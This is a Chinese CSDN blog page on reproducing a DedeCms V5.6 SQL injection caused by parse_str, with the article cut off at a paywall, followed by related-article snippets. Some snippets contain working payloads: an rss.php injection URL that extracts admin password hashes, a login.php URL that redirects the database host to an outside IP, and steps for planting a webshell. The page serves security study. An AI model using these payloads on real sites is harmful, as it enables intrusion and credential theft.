DedeCms V5.6 parse_str函数引起的sql注入漏洞

最新推荐文章于 2024-08-03 16:43:27 发布
最新推荐文章于 2024-08-03 16:43:27 发布
阅读量1.2k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37711941/article/details/89193169
版权
本文详细介绍了DedeCms V5.6版本中的一个SQL注入漏洞,通过分析补丁和源码,揭示了漏洞产生的原因。作者通过对比文件差异,发现可控的HTTP_USER_AGENT能影响加密过程,并尝试构造payload绕过过滤机制,但在实际复现过程中遇到了过滤导致的问题。
摘要由CSDN通过智能技术生成

看红日审计系列,心想还有这个漏洞,决定自己复现一遍。然而。。。。。。。。。。。谁能救救我。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

一、下载

下载地址:http://www.dedecms/upimg/soft/2010/DedeCmsV5.6-UTF8-Final.tar.gz

二、安装

解压后将其放在apache的www目录下,访问uploads/install/index.php进行安装。(此处注意修改文件夹权限!)

安装成功后,访问主界面如下:
在这里插入图片描述

三、漏洞分析

选取补丁版本为20140225,该补丁更新内容如下:
在这里插入图片描述
将cms中的member/buy_action.php和补丁更新的buy_action.php进行对比(此处使用的对比工具是sublime text3的FileDiffs插件,下载地址:https://github.com/colinta/SublimeFileD

最低0.47元/天 解锁文章
崔崔是我
关注
ShowDoc item_id 未授权SQL注入漏洞复现
0xSec
06-05 1381
2024年6月,ShowDoc官方发布新版本修复了一个SQL注入漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可暴破用户token获取系统后台权限,建议所有使用该系统的企业尽快升级修复,以确保系统安全。
RK3399平台开发系列讲解(系统篇)1.18、init_parse_config_file函数解析init.rc脚本示意图
内核笔记
08-06 1900
init_parse_config_file函数解析init.rc脚本示意图
DEDECMS v5.6漏洞复现
_Ralph的博客
01-16 7997
织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类cms系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 闲来无事,复现一下dedecms v5.6版
DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
网站安全专家
08-10 3847
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞,存在高危的parse_str函数sql注入漏...
DeDeCMS漏洞
最新发布
weixin_53198216的博客
08-03 193
4.在生成下选择更新主页HTML,将主页位置后缀改为php,首页模式选择生成静态,再点击更新主页HTML。2.选择模板下的默认模板管理,找到index.htm。7.打开蚁剑,输入网址和密码点击测试连接,显示成功。6.复制到地址栏访问,没有显示内容证明注入成功。3.对这个文件进行编辑写入一句话木马并保存。5.出现一个更新后的路径。
dedecms织梦 v5.6 两处跨站漏洞
weixin_33928137的博客
03-21 185
漏洞版本: dedecms织梦 v5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在...
DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布)
weixin_33742618的博客
04-19 427
2019独角兽企业重金招聘Python工程师标准>>> ...
最新 DEDECMS SQL 注入 0day
weixin_34056162的博客
07-10 456
4月29日消息:国内安全研究团队“知道创宇”称截获到最新DEDECMS SQL注入0day,DEDECMS官网目前提供下载的最新版5.7也受影响,截止本告警发出时官方尚未给出补丁或解决方案,此漏洞利用简单且dedecms安装之后默认即开启漏洞模块。 知道创宇给出三种临时解决方案: 方案一:临时补丁,需要四步 1、确保您的magic_quotes_gpc = On 开启方式:打开php安装目...
Python||pd.read_csv()函数parse_dates()参数详解
热门推荐
漫步量化
11-21 3万+
read_csv()参数列表,官方文档 pandas.read_csv(filepath_or_buffer, sep=', ', delimiter=None, header='infer', names=None, index_col=None, usecols=None, squeeze=False, prefix=None, mangle_dupe_cols=True, dtype...
dedesql.class.php注入,DedeCMS SQL注入
weixin_39884373的博客
04-05 372
发布时间:2016-08-21公开时间:N/A漏洞类型:SQL注入危害等级:高漏洞编号:xianzhi-2016-08-39374560测试版本:N/A漏洞详情plus/carbuyaction.php$Items=$cart->getItems();if(empty($Items)){ShowMsg("您的购物车中没有商品!","-1");exit();}………...
【原】织梦dedecms v5.6 discuz7.2 xss漏洞
步满生错的专栏
09-28 2585
2010年07月05日 星期一 23:31 由于某度众所周知的举动,让我搬离写了5年的渣度空间,准备把技术性的文章定在CSDN了。这些都是文章备份。勿怪。。 鉴于最近有些抓取机器和抄袭者,把标题的【原】字都复制,我不得不声明:本文为 yukon12345原创,转载请注明出
php越权访问漏洞,织梦(DedeCms) v5.6-5.7 越权访问漏洞
weixin_29220405的博客
03-24 654
http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS]...
dedecms 漏洞汇总
积木网络
02-29 1万+
Dedecms 5.6 rss注入漏洞   http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1 DedeCms v5.6 嵌入
dedecms织梦SESSION变量覆盖导致SQL注入common.inc.php
09-07 279
漏洞描述:dedecms的/plus/advancedsearch.php中,直接从SESSION[SESSION[sqlhash]获取值作为$query带入SQL查询,这个漏洞的利用前提是session.auto_start = 1即开始了自动SESSION会话,云盾团队在dedemcs的变量注册入口进行了通用统一防御,禁止SESSION变量的传入。dedecms SESSION变量覆盖导致SQL注入common.inc.php的解决方法。补丁文件:/include/common.inc.php。
dedecms_5.7 download.php SQL注入
weixin_30558305的博客
03-25 650
  最近在看Web渗透与漏洞挖掘,这本书的编写目的感觉非常的不错,把渗透和代码审计结合在一起,但是代码审计部分感觉思路个人认为并不是很清晰,在学习dedecms v5.7 SQL注入的时候就只看懂了漏洞,思路依然感觉迷茫,在这里我重新梳理一下这个漏洞的挖掘思路。   这个漏洞主要包括两方面,一是SQL注入本身,二是全局变量$GLOBALS可以被用户操控。拿到cms我们还是先浏览大致的结...
DedeCMS group.php SQL注入漏洞
网站守护中心
04-13 953
DedeCMS group.php SQL注入漏洞WASC Threat Classification 描述: 目标存在SQL注入漏洞。 1.SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。 2.DedeCMS存在对URL中的参数未作任何过滤,导致SQL注入漏洞。     3.在group/global.inc.php中, $db->SetQuery("SEL
php 5.6.15漏洞,DEDECMS 5.6最新Get Shell漏洞 DEDECMS 5.3/5.6
weixin_39636333的博客
03-11 206
DEDECMS 5.6最新Get Shell漏洞影响版本:  DEDECMS 5.3/5.6漏洞描述:DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居...
dedecms sql注入漏洞
06-28
Dedecms SQL注入漏洞是指在Dedecms系统中存在的一种安全漏洞,攻击者可以通过该漏洞向数据库中注入恶意代码,从而实现对网站的攻击和控制。该漏洞主要是由于Dedecms系统中的parse_str函数存在变量覆盖问题,攻击者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值